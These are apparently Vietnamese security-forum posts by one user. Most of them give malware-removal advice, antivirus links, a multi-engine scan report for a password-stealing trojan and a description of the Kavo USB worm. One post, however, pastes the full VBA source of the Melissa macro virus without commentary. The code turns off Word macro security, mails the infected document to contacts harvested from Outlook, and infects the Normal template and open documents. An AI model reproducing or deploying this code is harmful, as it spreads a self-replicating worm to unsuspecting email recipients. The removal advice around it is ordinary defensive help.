Messages posted by: InTeR Alias

Như tên của Diễn Đàn này là Thảo luận virus, trojan, spyware, worm....Nên các anh em ko biết thì mới hỏi để học hỏi thêm.Mặc dù Angel_A nói còn chung chung là sâu STORM (nhiều loại) nhưng nếu không có cơ sở thì Angel_A hỏi để làm gì tmd ? Nếu thấy ko thể trả lời đc thì bạn có thể nói : "Hỏi quá chung chung ! Không đủ (hoặc thích) trả lời" Cũng như anh conmale cũng hỏi : "Sâu STORM nào? Cung cấp thêm thông tin đi chớ nói chung chung như thế thì biết đường nào mà trả lời?" : Phải xác định lại như anh ấy cũng nên chứ ?
Angel_A có thể tham khảo các thông tin Virus bằng tiếng việt ở đây :
http://www.bkav.com.vn/thong_tin_virus/
Vào ô Tìm Kiếm ,nhập tên (loại) muốn tìm vào.Kết quả hoàn toàn bằng tiếng việt như bạn muốn.

Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else smilie

"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub

Trả lời như thế thì Seach phát ra ngay lập tức chứ cần gì tìm hiểu thêm ?
---
Có thể hướng dẫn rộng thêm như lời Angel_A đã nói ở phía trên ko ? Sâu hơn một tý và làm ơn bằng tiếng mẹ đẻ đi tmd ơi !

Xóa AutoRun.Inf đi.
Cũng có thể xóa xong vẫn ko đc thì bạn cần Fix lại Registry (bị ăn bởi VR)
tham khảo thêm ở đây
/hvaonline/posts/list/14406.html

Thử cách này nhé :
AVG AntiSpyware đi Thanh.
http://free.grisoft.com/doc/20/lng/us/tpl/v5
Vào chế độ Safe Mode quyét 1 lượt đầu (trước khi vào Safe Mode nhớ Update đã nhé)
Sau khi Scan xong khởi động lại máy.Để vào chế độ bình thường.Bước tiếp theo :
Download :
SDFix
http://downloads.andymanchesta.com/RemovalTools/SDFix.zip
(Nên nhớ là đừng có Extract File ".Zip" trước)
Lại vào lại chế độ Safe Mode như bước 1:
A: Lần này nhấn vào SDFix.zip và chọn nút Extract All.
Sau khi giải nén vào thư mục vừa giải nén chọn RunThis.bat để bắt đầu Script.
Khi chương trình chạy nhấn tiếp nút Y để bắt đầu.
Khi này chương trình sẽ tìm và diệt Trojan Services và các loại khác (nếu có).Tìm và Fix lại các lỗi Registry and Prompt do các con đó gây ra.
+Kết thúc bước A: Nhấn bất kỳ phím nào để khởi động lại máy.
(Lần khởi động lại này có lẽ sẽ hơi lâu khi đăng nhập vào Windows vì chương trình đang làm nốt các bước còn lại trước khi chạy cào lại hệ thống)
Khi hiện lên màn hình Desktop chương trình sẽ tự động khởi động lại fixtool hoặc bạn phải kick hoạt bằng tay lại như bước A để hoàn thành.
Nhấn nút Finished khi hoàn thành.
Nếu muốn xem lại bạn có thể vào lại thư mục SDFix và tìm file Report.txt để xem lại.
(cách này có thể Fix các loại VR không biết hoặc SPY mới chưa có Tools diệt)
Tham khảo thêm :
http://www.symantec.com/security_response/writeup.jsp?docid=2002-011710-0057-99&tabid=3

Con Avpo này diệt được hết rồi mà ? Bạn Update chương trình Anti lên đi.Cả AVG và mọi trình Anti khác đều thấy có Database về con này rồi.Không thì bạn dùng thằng NOD32 3.0.414 RC1 mà diệt.Đãm bảo hết.
http://download1.eset.com/special/essrc1/ea_nt32_ENU.msi
------------------------------------------------------------------------------------------------------
File avpo.exe received on 09.09.2007 11:51:38 (CET)Antivirus Version Last Update Result
AhnLab-V3 2007.9.8.0 2007.09.07 -
AntiVir 7.6.0.5 2007.09.08 TR/Crypt.NSPM.Gen
Authentium 4.93.8 2007.09.07 -
Avast 4.7.1043.0 2007.09.08 -
AVG 7.5.0.485 2007.09.08 PSW.OnlineGames.HXY
BitDefender 7.2 2007.09.09 Trojan.PWS.Onlinegames.NEC
CAT-QuickHeal 9.00 2007.09.08 TrojanPSW.OnLineGames.blt
ClamAV 0.91.2 2007.09.09 -
DrWeb 4.33 2007.09.08 modification of Win32.Besso
eSafe 7.0.15.0 2007.09.04 Win32.OnLineGames.bl
eTrust-Vet 31.1.5119 2007.09.08 Win32/NSAnti
Ewido 4.0 2007.09.08 -
FileAdvisor 1 2007.09.09 -
Fortinet 3.11.0.0 2007.09.08 W32/OnLineGames.BLT!tr.pws
F-Prot 4.3.2.48 2007.09.07 -
F-Secure 6.70.13030.0 2007.09.09 Trojan-PSW.Win32.OnLineGames.blt
Ikarus T3.1.1.12 2007.09.09 Trojan-PWS.OnlineGames.NEC
Kaspersky 4.0.2.24 2007.09.09 Trojan-PSW.Win32.OnLineGames.blt
McAfee 5115 2007.09.07 PWS-LegMir
Microsoft 1.2803 2007.09.09 TrojanDropper:Win32/Agent!DDD9
NOD32v2 2515 2007.09.09 Win32/PSW.Agent.NDP
Norman 5.80.02 2007.09.07 W32/OnlineGames.gen31
Panda 9.0.0.4 2007.09.09 W32/Lineage.FGT.worm
Prevx1 V2 2007.09.09 Heuristic: Suspicious Self Modifying EXE
Rising 19.39.62.00 2007.09.09 -
Sophos 4.21.0 2007.09.09 -
Sunbelt 2.2.907.0 2007.09.07 -
Symantec 10 2007.09.09 -
TheHacker 6.1.10.182 2007.09.08 Trojan/PSW.OnLineGames.blt
VBA32 3.12.2.4 2007.09.08 -
VirusBuster 4.3.26:9 2007.09.08 Trojan.PWS.OnLineGames.BBJ
Webwasher-Gateway 6.0.1 2007.09.08 Trojan.Crypt.NSPM.Gen

Additional information
File size: 67745 bytes
MD5: d9ddbe2dd4fec98bfc78c7266654ea20
SHA1: b79128928f4ac77b389edff5fcbeabb8cfcf1c4d
Prevx info: http://fileinfo.prevx.com/fileinfo.a...11210060B7271B

Như vậy là tạm thời bạn ko thể Remove chương trình được nữa ? Bạn có thể dùng các chương trình hỗ trợ như System Cleaner 5 (http://www.pointstone.com/) hoặc các Tool tương tự có chế độ Add Or Remove Programs (thay cho Windows).

Bạn có thể diệt các virus lạ bằng thằng NOD32 3.0.414 RC1
Link nè :
Download NOD32 3.0.414 RC1 for Windows NT/2000/2003/XP 32-bit - 14.5 MB
http://download1.eset.com/special/essrc1/ea_nt32_ENU.msi
Download NOD32 3.0.414 RC1 for Windows NT/2000/2003/XP 64-bit - 15.5 MB
http://download1.eset.com/special/essrc1/ea_nt64_ENU.msi

Tên malware: W32.Kavo.Worm
Thuộc họ:W32.Kavo.Worm
Loại: Worm
Ngày phát hiện mẫu: 17/09/2007
Kích thước: 101 KB
Mức độ phá hoại: Trung bình
Nguy cơ:

Làm giảm mức độ an ninh của hệ thống.
Ăn cắp thông tin cá nhân.
Hiện tượng:

Sửa registry.
Xuất hiện file ntdelect.com và autorun.inf ở các ổ đĩa.
Cách thức lây nhiễm:

Tự động lây nhiễm vào USB.
Cách phòng tránh:

Không nên mở các ổ USB mới chưa được quét virus bằng cách nháy kép vào ổ đĩa.
Không nên mở file không rõ nguồn gốc, đặc biệt là các file có đuôi .exe .com .pif và .bat
Mô tả kỹ thuật:

Ghi giá trị
"kava"="%Sysdir%\Kavo.exe"
Vào key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Copy bản thân thành file %Sysdir%\Kavo.exe
Tạo ra các file %Temp%\c2jvjzr8.dll, %Sysdir%\Kavo0.dll, %Sysdir%\Kavo1.dll, ...
Copy bản thân thành file ntdelect.com, tạo ra file Autorun.inf vào các ổ đĩa.
Ăn cắp tài khoản, thông tin các games online.
(Nguồn Bkis)
----------
Con này có thể Update các bản Anti Virus rồi diệt là sạch - Hoặc tải bản BKAV mới nhất về quyét hoặc dùng chương trình [FireLion] FastHelper của MOD Hoàng tại http://fasthelper.fire-lion.com/ về quyét cũng sạch

Sao lưu các File trong USB mà bạn cảm thấy cần thiết lại.
Format USB đi có thể con virus bị diệt rồi nhưng vẫn còn mấy cái autorun.inf và một số file SET chế độ xem trong USB vẫn còn sót lại nên việc bạn ko nhìn thấy các file ẩn trong usb có thể lý giải đc.
Mà sao để mấy con virus USB hoành hành thế nhỉ.Tôi vẫn xài AVG 7.5 mà có bị sao đâu.Chắc tại ko chịu Update thường xuyên rồi.

DakMil có thể chi tiết hơn cho Mod Hoàng và anh em tham khảo thêm được ko ? Nói thế này thì quả thật ko hình dung ra nỗi nó là con nào ! Hihi !

Vẫn là Virus USB mà smilie

Update Anti đi rồi Safe Mode diệt là hết ấy mà smilie

Virus Việt Nam (Chế Tạo Lại)
Dính từ WEB (1%) hoặc USB (99%)
Bật chế độ hiện File ẩn lên bạn sẽ thấy các thư mục của bạn bị ẩn đi còn các biểu tượng giống hình thư mục và bị coppy nguyên bản tên của thư mục trong ổ đĩa của bạn là Virus
Ví dụ :
Thư Mục "Software"
dính virus thì nó ẩn thư mục này đi rồi tạo một file exe khác có tên Software.exe để đánh lừa bạn kick vào nó !
tải các bản Update cảu Anti Virus rồi vào safe mode quyét là sạch !